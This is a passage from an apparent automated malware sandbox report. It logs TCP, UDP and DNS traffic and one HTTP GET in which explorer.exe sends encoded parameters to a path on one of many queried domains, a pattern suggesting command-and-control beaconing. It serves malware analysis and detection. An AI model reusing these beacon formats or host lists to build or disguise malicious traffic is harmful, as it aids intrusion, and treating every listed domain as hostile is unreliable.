                                                                        Nov 20, 2020 11:07:16.693417072 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.693444967 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.696773052 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.696902990 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:21.605900049 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.718278885 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.718374968 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.718597889 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.830941916 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831310034 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831334114 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:21.831466913 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.831562042 CET4973780192.168.2.73.12.202.18
                                                                        Nov 20, 2020 11:07:21.943883896 CET80497373.12.202.18192.168.2.7
                                                                        Nov 20, 2020 11:07:31.953761101 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:31.978790045 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:31.978914022 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:31.979074955 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.004002094 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:32.005081892 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.005289078 CET4975280192.168.2.7160.153.136.3
                                                                        Nov 20, 2020 11:07:32.030204058 CET8049752160.153.136.3192.168.2.7
                                                                        Nov 20, 2020 11:07:38.640206099 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.803186893 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.803288937 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.803448915 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.972686052 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979562044 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979593039 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:38.979859114 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:38.979948997 CET4975380192.168.2.7194.35.122.226
                                                                        Nov 20, 2020 11:07:39.141820908 CET8049753194.35.122.226192.168.2.7
                                                                        Nov 20, 2020 11:07:44.211316109 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.378349066 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.378618956 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.378768921 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.545849085 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546214104 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546289921 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546302080 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:44.546466112 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.546518087 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.546523094 CET4975480192.168.2.7104.253.79.71
                                                                        Nov 20, 2020 11:07:44.714863062 CET8049754104.253.79.71192.168.2.7
                                                                        Nov 20, 2020 11:07:49.639825106 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.678709030 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.678859949 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.679070950 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.717953920 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761483908 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761545897 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:49.761744976 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.761881113 CET4975680192.168.2.735.246.6.109
                                                                        Nov 20, 2020 11:07:49.800853014 CET804975635.246.6.109192.168.2.7
                                                                        Nov 20, 2020 11:07:54.844347000 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:54.966379881 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:54.966509104 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:54.966870070 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.088880062 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281188011 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281485081 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.281558990 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:07:55.281620979 CET4975880192.168.2.7185.201.11.126
                                                                        Nov 20, 2020 11:07:55.403640032 CET8049758185.201.11.126192.168.2.7
                                                                        Nov 20, 2020 11:08:00.347841978 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.452924967 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.453139067 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.453313112 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.556237936 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556266069 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556281090 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:00.556488991 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.556579113 CET4975980192.168.2.752.71.133.130
                                                                        Nov 20, 2020 11:08:00.659429073 CET804975952.71.133.130192.168.2.7
                                                                        Nov 20, 2020 11:08:05.659286976 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.674153090 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.674334049 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.674489975 CET4976080192.168.2.713.226.173.80
                                                                        Nov 20, 2020 11:08:05.689215899 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691483021 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691700935 CET804976013.226.173.80192.168.2.7
                                                                        Nov 20, 2020 11:08:05.691761971 CET4976080192.168.2.713.226.173.80

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 20, 2020 11:06:24.695208073 CET5873953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:24.722343922 CET53587398.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:26.237132072 CET6033853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:26.264065981 CET53603388.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:31.382118940 CET5871753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:31.409208059 CET53587178.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:32.438592911 CET5976253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:32.465584993 CET53597628.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:33.313208103 CET5432953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:33.340243101 CET53543298.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:34.124548912 CET5805253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:34.151561975 CET53580528.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:38.857039928 CET5400853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:38.903969049 CET53540088.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:39.094918013 CET5945153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:39.121886015 CET53594518.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:40.279426098 CET5291453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:40.306454897 CET53529148.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:41.780988932 CET6456953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:41.808187962 CET53645698.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:43.496880054 CET5281653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:43.545059919 CET53528168.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:44.563770056 CET5078153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:44.590708971 CET53507818.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:45.217900038 CET5423053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:45.244940042 CET53542308.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:46.532702923 CET5491153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:46.559850931 CET53549118.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:47.283731937 CET4995853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:47.310795069 CET53499588.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:48.015352011 CET5086053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:48.042587042 CET53508608.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:50.693610907 CET5045253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:50.720668077 CET53504528.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:51.774281979 CET5973053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:51.801292896 CET53597308.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:52.509279013 CET5931053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:52.536370993 CET53593108.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:53.018472910 CET5191953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:53.045543909 CET53519198.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:53.778512955 CET6429653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:53.814062119 CET53642968.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:06:54.550476074 CET5668053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:06:54.577477932 CET53566808.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:08.506925106 CET5882053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:08.554796934 CET53588208.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:08.633372068 CET6098353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:08.681593895 CET53609838.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:09.575184107 CET4924753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:10.355617046 CET53492478.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:10.573728085 CET5228653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:10.610713959 CET53522868.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:15.370619059 CET5606453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:15.667937994 CET53560648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:19.126965046 CET6374453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:19.164304018 CET53637448.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.163629055 CET6145753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.199383020 CET53614578.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.464678049 CET5836753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.604794979 CET53583678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:21.691340923 CET6059953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:21.729232073 CET53605998.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.059649944 CET5957153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:22.095258951 CET53595718.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:22.490994930 CET5268953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:22.526623964 CET53526898.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.161501884 CET5029053192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:23.188550949 CET53502908.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:23.994404078 CET6042753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.032332897 CET53604278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.212080002 CET5620953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.256122112 CET53562098.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:24.626653910 CET5958253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:24.662291050 CET53595828.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:25.574372053 CET6094953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:25.610099077 CET53609498.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.049972057 CET5854253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.085650921 CET53585428.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:26.373533010 CET5917953192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:26.419915915 CET53591798.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:31.892540932 CET6092753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:31.952383041 CET53609278.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:37.022685051 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.007904053 CET5785453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:38.637741089 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:38.645028114 CET53578548.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:43.998091936 CET6202653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:44.209893942 CET53620268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:47.683054924 CET5945353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:47.718767881 CET53594538.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:49.590164900 CET6246853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:49.638459921 CET53624688.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:50.345526934 CET5256353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:50.372570992 CET53525638.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:07:54.783478975 CET5472153192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:07:54.842215061 CET53547218.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:00.294127941 CET6282653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:00.346420050 CET53628268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:05.605511904 CET6204653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:05.657974005 CET53620468.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:10.702775002 CET5122353192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:10.896162033 CET53512238.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:11.861721992 CET6390853192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:11.888716936 CET53639088.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:16.285459042 CET4922653192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:16.345438957 CET53492268.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:21.531033039 CET6021253192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:21.683366060 CET53602128.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:26.922692060 CET5886753192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:26.962616920 CET53588678.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:32.013992071 CET5086453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:32.363317966 CET53508648.8.8.8192.168.2.7
                                                                        Nov 20, 2020 11:08:37.781757116 CET6150453192.168.2.78.8.8.8
                                                                        Nov 20, 2020 11:08:38.542803049 CET53615048.8.8.8192.168.2.7

                                                                        ICMP Packets

                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Nov 20, 2020 11:07:38.645275116 CET192.168.2.78.8.8.8d013(Port unreachable)Destination Unreachable

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Nov 20, 2020 11:07:09.575184107 CET192.168.2.78.8.8.80x1206Standard query (0)www.handsfreedocs.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:15.370619059 CET192.168.2.78.8.8.80x117fStandard query (0)www.maninhatphoto.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.464678049 CET192.168.2.78.8.8.80x9c6eStandard query (0)www.placeduconfort.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.892540932 CET192.168.2.78.8.8.80xf39dStandard query (0)www.heartandcrowncloset.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:37.022685051 CET192.168.2.78.8.8.80xa3bbStandard query (0)www.fahufu.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.007904053 CET192.168.2.78.8.8.80xa3bbStandard query (0)www.fahufu.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:43.998091936 CET192.168.2.78.8.8.80x19a6Standard query (0)www.the-gongs.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.590164900 CET192.168.2.78.8.8.80x3a20Standard query (0)www.shopnicknaks.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.783478975 CET192.168.2.78.8.8.80x3f24Standard query (0)www.sweetbasilmarketing.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:00.294127941 CET192.168.2.78.8.8.80xc8ebStandard query (0)www.justsoldbykristen.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.605511904 CET192.168.2.78.8.8.80x2a2aStandard query (0)www.ariasu-nakanokaikei.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:10.702775002 CET192.168.2.78.8.8.80x9a72Standard query (0)www.realitytvstockwatch.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.285459042 CET192.168.2.78.8.8.80x6cbbStandard query (0)www.searchnehomes.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.531033039 CET192.168.2.78.8.8.80xa56cStandard query (0)www.happinestbuilders.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:26.922692060 CET192.168.2.78.8.8.80xbf40Standard query (0)www.hemparcade.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:32.013992071 CET192.168.2.78.8.8.80xca10Standard query (0)www.lotoencasa.comA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:37.781757116 CET192.168.2.78.8.8.80xa179Standard query (0)www.handsfreedocs.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Nov 20, 2020 11:07:10.355617046 CET8.8.8.8192.168.2.70x1206Server failure (2)www.handsfreedocs.comnonenoneA (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:15.667937994 CET8.8.8.8192.168.2.70x117fNo error (0)www.maninhatphoto.com154.86.218.70A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)www.placeduconfort.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:21.604794979 CET8.8.8.8192.168.2.70x9c6eNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.952383041 CET8.8.8.8192.168.2.70xf39dNo error (0)www.heartandcrowncloset.comheartandcrowncloset.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:31.952383041 CET8.8.8.8192.168.2.70xf39dNo error (0)heartandcrowncloset.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.637741089 CET8.8.8.8192.168.2.70xa3bbNo error (0)www.fahufu.comfahufu.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.637741089 CET8.8.8.8192.168.2.70xa3bbNo error (0)fahufu.com194.35.122.226A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.645028114 CET8.8.8.8192.168.2.70xa3bbNo error (0)www.fahufu.comfahufu.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:38.645028114 CET8.8.8.8192.168.2.70xa3bbNo error (0)fahufu.com194.35.122.226A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:44.209893942 CET8.8.8.8192.168.2.70x19a6No error (0)www.the-gongs.com104.253.79.71A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)www.shopnicknaks.comwww188.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)www188.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:49.638459921 CET8.8.8.8192.168.2.70x3a20No error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.842215061 CET8.8.8.8192.168.2.70x3f24No error (0)www.sweetbasilmarketing.comsweetbasilmarketing.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:07:54.842215061 CET8.8.8.8192.168.2.70x3f24No error (0)sweetbasilmarketing.com185.201.11.126A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:00.346420050 CET8.8.8.8192.168.2.70xc8ebNo error (0)www.justsoldbykristen.com52.71.133.130A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.80A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.83A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.107A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:05.657974005 CET8.8.8.8192.168.2.70x2a2aNo error (0)www.ariasu-nakanokaikei.com13.226.173.49A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:10.896162033 CET8.8.8.8192.168.2.70x9a72No error (0)www.realitytvstockwatch.com103.224.182.242A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.345438957 CET8.8.8.8192.168.2.70x6cbbNo error (0)www.searchnehomes.comsearchnehomes.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:08:16.345438957 CET8.8.8.8192.168.2.70x6cbbNo error (0)searchnehomes.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)www.happinestbuilders.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.134.22.63A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.12.202.18A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:21.683366060 CET8.8.8.8192.168.2.70xa56cNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.72.189A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:26.962616920 CET8.8.8.8192.168.2.70xbf40No error (0)www.hemparcade.com52.58.78.16A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:32.363317966 CET8.8.8.8192.168.2.70xca10No error (0)www.lotoencasa.com192.155.168.14A (IP address)IN (0x0001)
                                                                        Nov 20, 2020 11:08:38.542803049 CET8.8.8.8192.168.2.70xa179Server failure (2)www.handsfreedocs.comnonenoneA (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.maninhatphoto.com
                                                                        • www.placeduconfort.com
                                                                        • www.heartandcrowncloset.com
                                                                        • www.fahufu.com
                                                                        • www.the-gongs.com
                                                                        • www.shopnicknaks.com
                                                                        • www.sweetbasilmarketing.com
                                                                        • www.justsoldbykristen.com
                                                                        • www.ariasu-nakanokaikei.com
                                                                        • www.realitytvstockwatch.com
                                                                        • www.searchnehomes.com
                                                                        • www.happinestbuilders.com
                                                                        • www.hemparcade.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.749734154.86.218.7080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:15.932311058 CET448OUTGET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.maninhatphoto.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:16.187412977 CET450INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Fri, 20 Nov 2020 10:07:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 9558
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
